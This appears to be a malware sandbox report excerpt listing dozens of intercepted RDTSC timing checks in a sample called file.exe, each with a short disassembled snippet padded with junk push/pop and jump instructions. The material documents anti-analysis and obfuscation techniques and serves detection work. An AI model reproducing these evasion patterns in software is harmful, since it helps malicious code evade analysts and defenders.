Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D878 second address: 56D890 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jc 00007F45D50449A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D890 second address: 56D8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A33h 0x00000009 popad 0x0000000a js 00007F45D5047A2Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D8B2 second address: 56D8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DA53 second address: 56DA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DA57 second address: 56DA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F45D50449A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DA67 second address: 56DA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DA6B second address: 56DA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DE5F second address: 56DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A35h 0x00000009 pop ebx 0x0000000a js 00007F45D5047A48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DE82 second address: 56DE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DFC3 second address: 56DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F45D5047A31h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F45D5047A2Ah 0x00000013 jnc 00007F45D5047A32h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DFF8 second address: 56DFFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E127 second address: 56E14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F45D5047A39h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5739DA second address: 573A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F45D50449B9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572825 second address: 57282A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57282A second address: 57282F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57282F second address: 57283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jo 00007F45D5047A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572AE8 second address: 572AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5731A8 second address: 5731C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578FDD second address: 578FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578FE1 second address: 578FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F3771 second address: 4F3775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E740 second address: 57E744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D270 second address: 57D28F instructions: 0x00000000 rdtsc 0x00000002 js 00007F45D50449C1h 0x00000008 jmp 00007F45D50449B5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D3A7 second address: 57D3C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F45D5047A30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D3C0 second address: 57D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D83F second address: 57D843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D843 second address: 57D84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D9DD second address: 57D9E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E0E3 second address: 57E0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E0E9 second address: 57E0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E0EF second address: 57E168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F45D50449A6h 0x00000009 jmp 00007F45D50449ACh 0x0000000e pop eax 0x0000000f jmp 00007F45D50449B7h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 jbe 00007F45D50449A6h 0x0000001e pop ecx 0x0000001f jmp 00007F45D50449B5h 0x00000024 pushad 0x00000025 jno 00007F45D50449A6h 0x0000002b jmp 00007F45D50449AFh 0x00000030 jne 00007F45D50449A6h 0x00000036 popad 0x00000037 pushad 0x00000038 jmp 00007F45D50449ACh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E168 second address: 57E16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5814CB second address: 5814CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58165F second address: 581691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A37h 0x00000007 jmp 00007F45D5047A34h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58181E second address: 58186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F45D50449B6h 0x0000000d jmp 00007F45D50449B0h 0x00000012 jne 00007F45D50449D3h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58186E second address: 581873 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E2E second address: 583E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E3E second address: 583E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E44 second address: 583E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E4E second address: 583E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E54 second address: 583E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583E58 second address: 583E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F45D5047A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583AD1 second address: 583AF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jno 00007F45D50449A6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 je 00007F45D50449A6h 0x0000001c jp 00007F45D50449A6h 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583AF4 second address: 583B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583B04 second address: 583B1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583B1B second address: 583B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45D5047A2Fh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5884AE second address: 5884B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5884B4 second address: 5884C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jns 00007F45D5047A26h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588179 second address: 588193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588193 second address: 5881A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F45D5047A26h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5881A1 second address: 5881B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B63 second address: 589B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B6A second address: 589B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589B71 second address: 589BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A34h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d ja 00007F45D5047A26h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F45D5047A2Ch 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D787 second address: 58D79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D79F second address: 58D7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A35h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jp 00007F45D5047A26h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC77 second address: 58CC7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC7D second address: 58CC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CC83 second address: 58CC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDC0 second address: 58CDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDC4 second address: 58CDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D061 second address: 58D06F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F45D5047A2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D22C second address: 58D234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D234 second address: 58D239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D239 second address: 58D23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D23F second address: 58D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D3A3 second address: 58D3A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D3A8 second address: 58D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593054 second address: 593068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449AFh 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593068 second address: 593093 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45D5047A28h 0x00000008 pushad 0x00000009 jnc 00007F45D5047A26h 0x0000000f jmp 00007F45D5047A38h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F4E second address: 591F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F58 second address: 591F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 jnc 00007F45D5047A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jnp 00007F45D5047A26h 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F82 second address: 591F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591F86 second address: 591F92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F45D5047A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5920D5 second address: 5920DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5920DA second address: 5920F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F45D5047A26h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F45D5047A28h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592246 second address: 59226A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F45D50449B5h 0x0000000c jl 00007F45D50449A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59226A second address: 59226F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59226F second address: 592282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449AFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592282 second address: 592290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F45D5047A26h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592290 second address: 592294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592294 second address: 5922BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45D5047A37h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592D57 second address: 592D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jp 00007F45D50449A6h 0x00000013 pop edx 0x00000014 jmp 00007F45D50449B7h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592D82 second address: 592D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595481 second address: 59548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F45D50449A6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B23C second address: 59B247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F45D5047A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B4F2 second address: 59B4FC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B4FC second address: 59B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD1D second address: 59BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C039 second address: 59C07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 ja 00007F45D5047A3Ch 0x0000000c jmp 00007F45D5047A30h 0x00000011 jl 00007F45D5047A26h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F45D5047A37h 0x0000001f je 00007F45D5047A26h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4862 second address: 5A486C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A486C second address: 5A487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D5047A2Dh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A392A second address: 5A392E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A392E second address: 5A394D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45D5047A37h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3A9C second address: 5A3AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3AB2 second address: 5A3ABC instructions: 0x00000000 rdtsc 0x00000002 js 00007F45D5047A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3C01 second address: 5A3C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3D53 second address: 5A3D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3ED7 second address: 5A3EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3EDB second address: 5A3EF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F45D5047A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F45D5047A2Fh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4034 second address: 5A4068 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45D50449A6h 0x00000008 jmp 00007F45D50449B9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F45D50449B1h 0x00000014 rdtsc
